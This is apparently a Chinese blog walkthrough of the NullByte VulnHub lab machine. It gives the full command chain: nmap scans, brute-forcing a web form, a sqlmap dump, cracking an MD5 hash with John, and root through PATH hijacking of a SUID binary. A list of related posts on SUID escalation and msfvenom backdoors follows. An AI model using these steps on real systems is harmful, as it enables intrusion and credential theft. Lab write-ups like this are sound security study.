【学渗透靶机——NullByte(suid 提权)】

已于 2023-06-18 15:07:19 修改
阅读量266 收藏
点赞数 1
分类专栏: 靶机学习 文章标签: 网络 安全 运维
于 2023-06-18 09:41:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jieli0901227/article/details/131265852
版权

NullByte

信息收集

主机信息收集

主机ip地址

nmap -sn  192.168.241.0/24

在这里插入图片描述

主机开放端口信息

nmap --min-rate 10000 -p- 192.168.241.161

在这里插入图片描述

主机开放端口详细信息

nmap -sT -sV -p80,111,777,53062 192.168.241.161

在这里插入图片描述

nmap 脚本探测主机漏洞信息

nmap --script=vuln  -p80,111,777,53062 192.168.241.161

在这里插入图片描述
主机开放了80(http),111,777(ssh),53062(未知) , SSH 目前没有收集到账号及密码信息,爆破ssh 暂时放弃,那重点放在80 端口上,

web信息收集

80端口

80 是http服务,先打开看看
在这里插入图片描述
查看源代码也没有用信息
在这里插入图片描述

下载图片文件分析

(1) 查看文件类型

file main.gif

在这里插入图片描述
(2)查看图片信息是否有捆绑

binwalk main.gif

在这里插入图片描述
(3)查看图片是否隐写信息

exiftool main.gif

在这里插入图片描述
发现有字符串:kzMb5nVYJw 这个有可能是SSH ROOT密码,也有可能是路径,
尝试登录失败
接下来尝试路径
在这里插入图片描述
果然是路径,, 但是这个需要输入key ,我们目前没有密码
查看源代码
在这里插入图片描述

暴力破解表单

说这个表单不能连接数据库,并且密码不复杂
那我们爆破尝试一下,打开burp 抓包进行爆破,使用rockyou.txt 这个密码字典,爆破出来密码为elite
在这里插入图片描述
输入密码后,输入admin
在这里插入图片描述
在这里插入图片描述

sql注入

从上面的url 判断可能存在sql注入,sqlmap 尝试一下

sqlmap -u "http://192.168.241.161/kzMb5nVYJw/420search.php?usrtosearch=admin"  --dump --batch

在这里插入图片描述

john 破解MD5 hash

表中的字符串可能是base64 尝试解密

echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE |base64 -d

在这里插入图片描述

c6d6bd7ebf806f43c76acc3681703b81

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

在这里插入图片描述

提权

获取系统初始立足点

密码破解出拉omega。使用密码对应账号ramses尝试SSH登录。登录成功 nmap 端口扫描时SSH的端口是777

在这里插入图片描述

查看当前用户以root权限能够执行命令

在这里插入图片描述
发现没有

查看计划任务

**在这里插入图片描述**

当前用户组可以操作哪些权限


查看文件.bash_history看看能不能发现当前账号执行过什么命令
在这里插入图片描述
这个是什么东西呢,,既然不认识,那就执行这个命令看看

在这里插入图片描述
procwatch 执行时调用了sh 和ps
知道上面的结果那么我们可以劫持ps命令提权了

提权操作

cd /var/www/backup
ln -s /bin/sh ps
export PATH=.:$PATH
./procwatch

在这里插入图片描述

也可以生成一个ps文件,然后里面写/bin/sh就可以,给这个文件所有权限然后执行二进制即可提权

懒惰的老鼠
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
系统渗透与防护——后门植入与SUID提权
m0_60643467的博客
10-09 1891
Msfvenom Msfvenom是MSF框架配套的攻击载荷生成器,可以用来生成木马程序,并在目标机上执行,在本地监听上线。 部分参数 -p:选择一个载荷 -f:生成的文件格式 -lhost:监听地址 -lport:监听端口 -o:输入文件名 -h:帮助 Msfvenom实验测试 Msfvenom生成后门文件 第一步,在kali生成后门文件 第二步,开启Linux靶机的root用户,并设置密码 上传后门文件至靶机 第三步,在kali中将后门文件发送到目标主机 在
靶机渗透NullByte: 1
weixin_64267091的博客
01-29 991
对于vulnhub中的靶机,我们都需先下载镜像,然后导入VM,并将改为NAT模式。首先我们再来看一下靶机渗透的步骤:信息收集-漏洞分析--提权。基本都是这个三个步骤,接下来开始我们今天的靶机渗透吧!
linux——SUID提权
梦想不是挂在嘴边炫耀的空气,而是需要认真实践,等到对的风,就展翅翱翔!
10-03 2323
一、Linux之特殊权限——SUID Linux的文件操作除了普通的读®、写(w)、执行(x)权限外,还有一些特殊的权限。但都可以使用chomd和chown命令来设置。他们分别是SUID、SGID、Stricky Bite,ACL's,SUDO and SELinux等 这里只针对SUID进行讲解 什么是SUID呢? SUID(Set User ID)是给予文件一个特殊类型的权限。具体作用就是把可执行程序所有者的权限赋予可执行程序,无论执行程序的是哪位用户,可执行程序都拥有它的所有者的权限。没有设置SU
渗透测试习之vulnhub系列靶机——DC1
jingzhou_666的博客
06-09 924
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,使用VMware即可直接运行。Drupal 是一个灵活的,基于 LAMP 技术栈的 CMS,它的模块化设计,允许通过安装和卸载模块的方式 添加和移除功能,同时,允许通过安装和卸载主题改变整个网站的视觉感观。在kali当中使用msf查看一下针对这个cms有哪些具体的模块可以使用使用模块弹出 meterpreter >代表利用成功可以继续进行后渗透3、漏洞利用。
Vulnhub靶机渗透习——DC-9
qq_45612828的博客
07-02 2898
Vulnhub靶机渗透习——DC-9
Linux下SUID提权方法
good good study
10-29 3846
SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。 已知的可用来提权的linux可行性的文件列表如下: nmap vim find bash more less nano cp 如下,新建一个2.txt的文件。我们查看权限为 -rw-r--r--。接下来我们加上suid权限,即让执行该命令的用户以命令拥有
『vulnhub系列』DC-1渗透SUID提权
good good study
03-20 1856
目录 信息收集 SUID提权 信息收集 靶机:https://download.vulnhub.com/dc/DC-1.zip 前面的信息收集web打点就不写了,和这类似—>vulnhub靶机lampiao渗透—脏牛提权(CVE-2016-5195),通过drupal7版本漏洞拿到了一个普通用户的shell 1. 获取flag1 python获取交互式shell python -c 'import pty; pty.spawn("/bin/bash")' flag1.txt中.
记录靶机渗透中用到的提权方法
Yaphst的博客
03-15 5575
1、find提权 (1)首先使用如下命令查看具有suid 权限的可执行二进制程序 find / -perm -4000 -type f 2>/dev/null 或 find / -perm -u=s -type f 2>/dev/null 参数含义参考find基础命令 -perm:按照文件权限来查找文件,4000,2000,1000为分别表示SUID,SGID,SBIT,如777为普通文件的最高权限,7000为特殊文件的最高权限 -type:d(目录)f(文件)c(字符设备文件)b(块设备文
看完这篇 教你玩转渗透测试靶机——Metasploitable2
热门推荐
Aluxian_的博客
03-09 2万+
Metasploitable2渗透测试详解Metasploitable2靶机介绍:Metasploitable2靶机下载:Metasploitable2靶机安装:Metasploitable2靶机漏洞详解: Metasploitable2靶机介绍: Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 Metasploita
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4428
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
vulhub渗透测试靶机习1
08-08
渗透测试靶机习0x01 lampiao靶机准备环境靶机下载地址https://download.vulnhub.com/lampiao/Lampiao.zip
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
nc网络收发测试-tcp客户端\TCP服务器\UDP\UDP广播
06-14 250
nc网络收发测试-tcp客户端
面向云计算平台的信息安全等级保护测评实践与建议
ddcajdkdl的博客
06-14 562
面向云计算平台的信息安全等级保护测评是一项系统工程,需要政府、云服务商、用户及第三方测评机构等多方共同努力,通过持续的技术创新与管理优化,确保云计算环境下的信息安全,为数字经济发展提供坚实的安全保障。
Wireshark TS | 应用传输丢包问题
7ACE的博客
06-09 722
Wireshark TS | 应用传输丢包问题
计算机网络(6) ICMP协议
最新发布
qq_42761215的博客
06-14 329
ICMP是网络通信中不可或缺的协议,虽然不传输用户数据,但在网络管理和诊断中起着重要作用。理解ICMP及其各种消息类型对于网络管理员和工程师来说是至关重要的,它有助于维护网络的正常运行和性能优化。
vulnhub靶机——raven: 2
09-03
- *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值